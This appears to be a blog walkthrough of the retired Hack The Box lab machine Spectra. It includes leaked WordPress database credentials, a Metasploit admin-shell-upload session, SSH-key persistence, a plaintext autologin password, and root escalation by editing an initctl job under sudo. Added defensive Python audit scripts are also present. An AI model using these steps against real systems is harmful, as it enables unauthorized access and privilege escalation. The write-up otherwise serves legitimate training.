Hackthebox - Spectra

Spectra

Summary

Spectra was an easy ChromeOS machine by egre55. The initial foothold was finding database credentials in a wp-config.php.save file leaking from the /testing route. Checking those credentials for reuse on the /main route (WordPress) was successful, and the unix/webapp/wp_admin_shell_upload Metasploit module gave a shell as nginx. Enumerating the box, a config in /opt hinted at checking for credentials in /etc/autologin, which gave the user's password so we could SSH in as that user. Privilege escalation on the box was abusing initctl to get root.

Initial Enumeration

nmap scan

# Nmap 7.91 scan initiated Sun Feb 28 08:24:56 2021 as: nmap -v -sC -sV -oN nmap/spectra 10.10.10.229
Nmap scan report for 10.10.10.229
Host is up (0.084s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
|_ 4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA)
80/tcp open http nginx 1.17.4
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.17.4
|_http-title: Site doesn't have a title (text/html).
3306/tcp open mysql MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
8081/tcp open blackice-icecap?
| fingerprint-strings:
| FourOhFourRequest, GetRequest:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Sun, 28 Feb 2021 02:55:18 GMT
| Connection: close
| Hello World
| HTTPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Sun, 28 Feb 2021 02:55:24 GMT
| Connection: close
|_ Hello World
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8081-TCP:V=7.91%I=7%D=2/28%Time=603B060A%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,71,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/plain\r\nD
SF:ate:\x20Sun,\x2028\x20Feb\x202021\x2002:55:18\x20GMT\r\nConnection:\x20
SF:close\r\n\r\nHello\x20World\n")%r(FourOhFourRequest,71,"HTTP/1\.1\x2020
SF:0\x20OK\r\nContent-Type:\x20text/plain\r\nDate:\x20Sun,\x2028\x20Feb\x2
SF:02021\x2002:55:18\x20GMT\r\nConnection:\x20close\r\n\r\nHello\x20World\
SF:n")%r(HTTPOptions,71,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/p
SF:lain\r\nDate:\x20Sun,\x2028\x20Feb\x202021\x2002:55:24\x20GMT\r\nConnec
SF:tion:\x20close\r\n\r\nHello\x20World\n");

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 28 08:25:45 2021 -- 1 IP address (1 host up) scanned in 48.70 seconds

The nmap scan shows four open ports: 22, 80, 3306 and 8081.

Let us start with port 80.

Web (80)

Clicking on the first link takes me to a spectra.htb URL,

so I added spectra.htb to my hosts file and revisited that page,

which seems to be a WordPress site.

So let's run wpscan on that and check the other link,

which exposes the contents of the testing directory. The most interesting file I saw there was wp-config.php.save, so I downloaded it:

wget http://spectra.htb/testing/wp-config.php.save

In that file I found the DB credentials:

define( 'DB_NAME', 'dev' );

/** MySQL database username */
define( 'DB_USER', 'devtest' );

/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );

Trying the same password on the WordPress login as administrator gives a successful login.
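A defender-side check for the leak above, added here as an example rather than code from the writeup: it parses the define() lines of a wp-config file and walks a web root for backup copies (.save, .bak, .orig, .old, ~) that still carry database credentials, the kind of file a typical nginx `location ~ \.php$` rule never hands to PHP and therefore serves as plain text. The sample text is constructed from the values shown above; the web-root path is whatever you pass in.

```python
import re
from pathlib import Path

# Editor and admin leftovers: with a typical nginx config only the .php
# extension reaches PHP, so these copies are served verbatim with their secrets.
BACKUP_SUFFIXES = (".save", ".bak", ".orig", ".old", "~")
DEFINE_RE = re.compile(
    r"""define\(\s*['"](?P<key>[A-Z_]+)['"]\s*,\s*['"](?P<val>[^'"]*)['"]\s*\)""")

def parse_wp_defines(text: str) -> dict:
    """Return the define('KEY', 'value') pairs found in wp-config text."""
    return {m.group("key"): m.group("val") for m in DEFINE_RE.finditer(text)}

def is_backup_copy(name: str) -> bool:
    """True for names like wp-config.php.save or wp-config.php~ (not the live file)."""
    return name.startswith("wp-config.php") and name.endswith(BACKUP_SUFFIXES)

def find_exposed_configs(webroot: str) -> list:
    """Walk a web root and list backup copies of wp-config.php that still hold
    database credentials, as (path, DB_USER) pairs. Meant as a pre-deploy check."""
    findings = []
    for path in Path(webroot).rglob("wp-config.php*"):
        if path.is_file() and is_backup_copy(path.name):
            defines = parse_wp_defines(path.read_text(errors="replace"))
            if "DB_PASSWORD" in defines:
                findings.append((str(path), defines.get("DB_USER", "?")))
    return findings

# Constructed sample mirroring the leaked file's define() lines.
SAMPLE = """\
define( 'DB_NAME', 'dev' );
/** MySQL database username */
define( 'DB_USER', 'devtest' );
/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );
"""

if __name__ == "__main__":
    import sys
    print(parse_wp_defines(SAMPLE))
    for path, user in find_exposed_configs(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"exposed: {path} (DB_USER={user})")
```

The same check belongs in the deploy pipeline, since the password in such a file is often reused for the WordPress admin account, as it was here.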

Knowing we have valid credentials, let's use msf to get a shell.

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username administrator
username => administrator
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password devteam01
password => devteam01
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set VHOST spectra.htb
VHOST => spectra.htb
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /main/
TARGETURI => /main/
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 10.10.10.229
RHOSTS => 10.10.10.229
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST tun0
LHOST => tun0
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

This gets me a shell, but a limited one, so I wrote an SSH key into

echo 'public-key' >> ~/.ssh/authorized_keys

and SSHed into the box using that key.

nginx (shell)

Enumerating the box, I found a script in /opt:

nginx@spectra /opt $ cat autologin.conf.orig
# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
description "Automatic login at boot"
author "chromium-os-dev@chromium.org"
# After boot-complete starts, the login prompt is visible and is accepting
# input.
start on started boot-complete
script
  passwd=
  # Read password from file. The file may optionally end with a newline.
  for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do
    if [ -e "${dir}/passwd" ]; then
      passwd="$(cat "${dir}/passwd")"
      break
    fi
  done
  if [ -z "${passwd}" ]; then
    exit 0
  fi
  # Inject keys into the login prompt.
  #
  # For this to work, you must have already created an account on the device.
  # Otherwise, no login prompt appears at boot and the injected keys do the
  # wrong thing.
  /usr/local/sbin/inject-keys.py -s "${passwd}" -k enter

which points me to the /etc/autologin/passwd file. Checking that file gives the password SummerHereWeCome!!,

with which we can SSH into the box as katie.

User (Katie)

Using the above password we can SSH into the box as katie.

Running linpeas

showed me this. Checking sudo -l also confirmed my suspicion:

katie@spectra /etc/init $ sudo -l
User katie may run the following commands on spectra:
(ALL) SETENV: NOPASSWD: /sbin/initctl

So, editing one of the test.conf job files, I added

echo "ssh-rsa <public-key>" >> /root/.ssh/authorized_keys

in its pre-start script and ran

sudo initctl start

and in another pane ran ssh -i key root@10.10.10.229, which logged me into the box as root.
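As an added example, not the author's autopwn script, here is a host-side audit in Python that checks the three conditions this escalation chained together: a NOPASSWD sudo rule for initctl, an init job file writable by non-root users, and a plaintext autologin password file. The sudo -l text is the output shown above; demo() builds a throwaway directory tree with an assumed group-writable test.conf and a placeholder password instead of touching the live /etc.

```python
import os
import re
import stat
import tempfile

# Constructed sample: the `sudo -l` output shown in the writeup.
SUDO_L_SAMPLE = """\
User katie may run the following commands on spectra:
    (ALL) SETENV: NOPASSWD: /sbin/initctl
"""
# One rule line: "(runas) TAG: TAG: /path/to/command [args]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S.*)$")

def parse_sudo_rules(text: str) -> list:
    """Parse the rule lines of `sudo -l` into (runas, tags, command) tuples."""
    rules = []
    for m in filter(None, map(RULE_RE.match, text.splitlines())):
        tags = tuple(t.rstrip(":") for t in m.group("tags").split())
        rules.append((m.group("runas"), tags, m.group("cmd").strip()))
    return rules

def audit(sudo_l_text: str, init_dir: str, autologin_dirs: list) -> list:
    """Report the three conditions that chained together on this host."""
    findings = []
    for runas, tags, cmd in parse_sudo_rules(sudo_l_text):
        if os.path.basename(cmd.split()[0]) == "initctl" and "NOPASSWD" in tags:
            findings.append(f"sudo: initctl runs as ({runas}) without a password, tags {tags}")
    for name in sorted(os.listdir(init_dir)) if os.path.isdir(init_dir) else []:
        path = os.path.join(init_dir, name)
        # group- or world-writable job file: whoever can edit it controls what initctl runs
        if name.endswith(".conf") and os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(f"init: {path} is writable by non-root users")
    for d in autologin_dirs:
        path = os.path.join(d, "passwd")
        if os.path.exists(path):
            findings.append(f"autologin: plaintext password file present at {path}")
    return findings

def demo() -> list:
    """Run the audit against a constructed tree instead of the live /etc (layout assumed)."""
    with tempfile.TemporaryDirectory() as tmp:
        init, auto = os.path.join(tmp, "init"), os.path.join(tmp, "autologin")
        os.mkdir(init); os.mkdir(auto)
        job = os.path.join(init, "test.conf")
        with open(job, "w") as f: f.write('description "test"\n')
        os.chmod(job, 0o664)  # group-writable job file, as assumed on the box
        with open(os.path.join(auto, "passwd"), "w") as f: f.write("placeholder\n")
        return audit(SUDO_L_SAMPLE, init, [auto])
```

On a real host you would call audit() with the current user's `sudo -l` output, /etc/init and the two autologin directories named in the Upstart job above.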

Extra

I even wrote a Python script to get root from user: autopwn

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/spectra/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.